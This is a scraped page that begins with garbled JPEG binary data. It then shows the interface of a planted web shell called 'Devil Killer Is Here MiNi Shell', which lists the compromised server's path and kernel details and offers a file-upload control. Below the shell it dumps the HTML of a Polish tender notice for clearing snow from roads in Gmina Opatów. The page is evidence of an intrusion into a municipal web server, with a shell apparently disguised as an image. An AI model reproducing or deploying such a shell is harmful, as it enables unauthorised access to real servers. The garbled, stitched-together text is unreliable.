JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211025/0024406301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odśnieżanie dróg gminnych na terenie Gminy Opatów w sezonie 2021/20222 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Opatów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830409844</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Obrońców Pokoju 34</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opatów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">opatow@umopatow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.umopatow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odśnieżanie dróg gminnych na terenie Gminy Opatów w sezonie 2021/20222 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-00da4480-3576-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00244063</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00056098/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Odśnieżanie dróg gminnych na terenie gminy Opatów w sezonie zimowym 2021/2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umopatow.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umopatow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja w niniejszym postępowaniu, w tym, wymiana informacji oraz<br/> przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, <br/> odbywa się w języku polskim, przy użyciu środków komunikacji elektronicznej za <br/> pośrednictwem platformy znajdującej się pod adresem <br/> https://umopatow.ezamawiajacy.pl/ lub poczty elektronicznej franczak@umopatow.pl<br/>8.2.W niniejszym postępowaniu ofertę oraz oświadczenia i dokumenty o których mowa <br/> w rozdz. VIII i IX niniejszej SWZ, składa się pod rygorem nieważności, w formie <br/> elektronicznej opatrzone kwalifikowanym podpisem elektronicznym osoby bądź osób <br/> umocowanych do reprezentacji wykonawcy lub w postaci elektronicznej opatrzonej <br/> podpisem zaufanym lub podpisem osobistym osoby bądź osób umocowanych do <br/> reprezentacji wykonawcy – za pośrednictwem platformy znajdującej się pod adresem <br/> https://umopatow.ezamawiajacy.pl/<br/>8.3.Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do <br/> Zamawiającego uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść <br/> dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, <br/> wniosków, zawiadomień oraz informacji przekazywanych na adres e mail <br/> Zamawiającego przyjmuje się datę dostarczenia wiadomości e – mail na adresy <br/> Zamawiającego. W przypadku skorzystania z platformy za datę wpływu dokumentów <br/> przyjmuję się datę ich złożenia/wysłania na Platformie.<br/>8.4.Ogólne zasady korzystania z platformy<br/> 1) Zgłoszenie do postępowania wymaga zalogowania Wykonawcy na Platformie <br/> https://umopatow.ezamawiajacy.pl/ lub https://oneplace.marketplanet.pl <br/> 2) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany <br/> do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o <br/> możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada <br/> konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia <br/> hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika <br/> polecenie „zarejestruj się”. <br/> 3) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku<br/> z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na <br/> rejestrację. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego <br/> otrzyma informacje, o możliwości przyspieszenia procedury założenia konta, <br/> wówczas należy skontaktować się pod numerem telefonu podanym w ww. <br/> potwierdzeniu. <br/>4).Po założeniu konta Wykonawca ma możliwość złożenia. Oferty <br/> w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, <br/> w szczególności zawiadomienia oraz informacje, przekazywane są w formie <br/> elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania <br/> zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem <br/> zakładki „Korespondencja”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">.Ochrona danych osobowych<br/> Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) <br/> 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/> z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich <br/> danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie <br/><br/> danych (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.Administratorem Pani/Pana danych osobowych będzie Urząd Miasta i Gminy Opatów <br/> Plac Obrońców Pokoju 34 reprezentowany przez Burmistrza Miasta i Gminy Opatów <br/>2.W sprawach z zakresu ochrony danych osobowych może Pani/Pan kontaktować się <br/> z Inspektorem Ochrony Danych pod adresem e-mail: inspektor@cbi24.pl<br/>3.Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit c RODO w <br/> celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia <br/> publicznego.<br/>4.Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym <br/> udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. <br/>4	ustawy Pzp.<br/>5.Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy <br/> Pzp., przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a <br/> jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas <br/> trwania umowy;<br/>6.Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana <br/> dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, <br/> związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; <br/> konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7.W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/> w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8.Posiada Pani/Pan:<br/> - na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana <br/> dotyczących;<br/> - na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych <br/> (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku <br/> postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy <br/> w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu <br/> oraz jego załączników);<br/> - na podstawie art. 18 RODO prawo żądania od administratora ograniczenia <br/> przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. <br/> 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania <br/> w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków <br/> ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z <br/> uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa <br/> członkowskiego)<br/> - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy <br/> uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza <br/> przepisy RODO;<br/>9.Nie przysługuje Pani/Panu:<br/> - w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> - prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> - na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych <br/> osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest <br/> art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IMK-III.271.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1.<br/>Odśnieżanie dróg we wsiach Adamów, Brzezie, Balbinów, Wąworków, Czerników Karski, Okalina Kolonia, Oficjałów<br/>Drogi: <br/>- Adamów nie ma dróg gminnych, <br/>- Brzezie – droga na stare Brzezie, w stronę Wąworkowa i koło szkoły do drogi <br/> powiatowej, <br/>- Balbinów – od drogi krajowej w stronę Kaliszan. <br/>- Wąworków- Kolonie , od posesji 18 do do Nikisiałki Dużej koło lasu, od posesji nr 55 <br/> obok posesji nr 45 i nr 47 do posesji nr 30, od drogi powiatowej do krajowej.<br/>- Czerników Karski – Zarzecze, na Murowaniec i Podrzecze<br/>- Okalina Kolonia przez wieś od stacji paliw do końca i obok ujęcia wody, Okalina Kolonia –Sady <br/>- Okalina Wieś – przez wieś, do posesji nr 28, do posesji nr 27 i do posesji nr 31<br/>- Oficjałów - Rzym<br/>Łączna długość dróg do odśnieżania wynosi w tej części 21,60km. <br/>Wykonawca przed przystąpieniem do przetargu musi zapoznać się z terenem – trasami dróg, ponieważ wiele odcinków dróg położonych jest w wąwozach , obok skarp i należy przewidzieć wywożenie śniegu z wąwozów lub usuwanie śniegu na odkład na skarpy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">160 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za czas reakcji na zgłoszenie poniżej 1h</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2. <br/>Odśnieżanie dróg we wsiach Gojców, Jagnin, Strzyżowice, Kobylanki, Kobylany.<br/>Drogi: <br/>- Gojców – od posesji nr 34 do posesji nr 41, droga Gojców – Włostów <br/>- Jagnin -przez wieś. <br/>- Strzyżowice – Ptasia, Strzyżowice –Gibki, Strzyżowice – Mydłowiec , od posesji nr 96 od <br/> posesji 99A; od posesji nr 1 do posesji nr 3; od posesji nr 4 do posesji nr 7; od posesji nr <br/> 10 do posesji nr 14<br/>- Kobylanki – przez wieś do ostatnich zabudowań,<br/>- Kobylany –Przecinka, Kobylany – Przepaść, Kobylany – Wymysłów, Kobylany pod las, <br/> droga obok szkoły w stronę Strzyżowic.<br/>Łączna długość dróg do odśnieżania wynosi w tej części 14,8km. <br/>Wykonawca przed przystąpieniem do przetargu musi zapoznać się z terenem – trasami dróg, ponieważ niektóre odcinki dróg położonych jest w wąwozach , obok skarp i należy przewidzieć wywożenie śniegu z wąwozów lub usuwanie śniegu na odkład na skarpy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">160 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za czas reakcji na zgłoszenie poniżej 1h</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3. <br/>Odśnieżanie dróg we wsiach Jałowęsy, Tomaszów, Zochcinek.<br/>Drogi:<br/>- Jałowęsy – Syrki, od stacji paliw do powiatówki, od posesji nr 53 do posesji 59<br/> od krajówki od posesji nr 70 -do ostatnich zabudowań, droga do Zochcinka <br/>- Tomaszów - w Grabówkę, <br/>- Zochcinek od Świętokrzyskiej obok DPS-u na Grabówkę, od ul. Czernika „Górą” do <br/> drogi na Grabówkę, od posesji nr 32 do posesji nr 33; od DPS-u w stronę Zochcina, od <br/> posesji nr 7A do posesji nr 15.<br/>Łączna długość dróg do odśnieżania wynosi w tej części 12,4km.<br/>Wykonawca przed przystąpieniem do przetargu musi zapoznać się z terenem – trasami dróg, ponieważ wiele odcinków dróg położonych jest w wąwozach , obok skarp i należy przewidzieć wywożenie śniegu z wąwozów lub usuwanie śniegu na odkład na skarpy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">160 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za czas reakcji na zgłoszenie poniżej 1h</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4. <br/>Odśnieżanie dróg we wsiach Jurkowice, Kochów, Marcinkowice, Czerników Opatowski, Czerników Karski<br/>Droga: <br/>- Jurkowice przez wieś od krajówki do wojewódzkiej, droga Jurkowice – Kochów , od <br/> posesji nr 31 do posesji nr 43, na Pipałę, do posesji nr 24 , od posesji nr 9 do posesji nr <br/> 13, Jurkowice - Marcinkowice ,<br/>- Kochów - Kochówek ,<br/>- Marcinkowice przez wieś, od posesji nr 58 do posesji nr 59 i od drogi krajowej do posesji <br/> nr 62.<br/>- Czerników Opatowski – przez wieś do ostatnich zabudowań, od drogi wojewódzkiej do <br/> posesji nr 44 i nr 45 oraz do posesji nr 34<br/>- Czerników Karski- na Murowaniec<br/>Łączna długość dróg do odśnieżania wynosi w tej części 17,20km. <br/>Wykonawca przed przystąpieniem do przetargu musi zapoznać się z terenem – trasami dróg, ponieważ wiele odcinków dróg położonych jest w wąwozach , obok skarp i należy przewidzieć wywożenie śniegu z wąwozów lub usuwanie śniegu na odkład na skarpy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">160 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za czas reakcji na zgłoszenie poniżej 1h</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 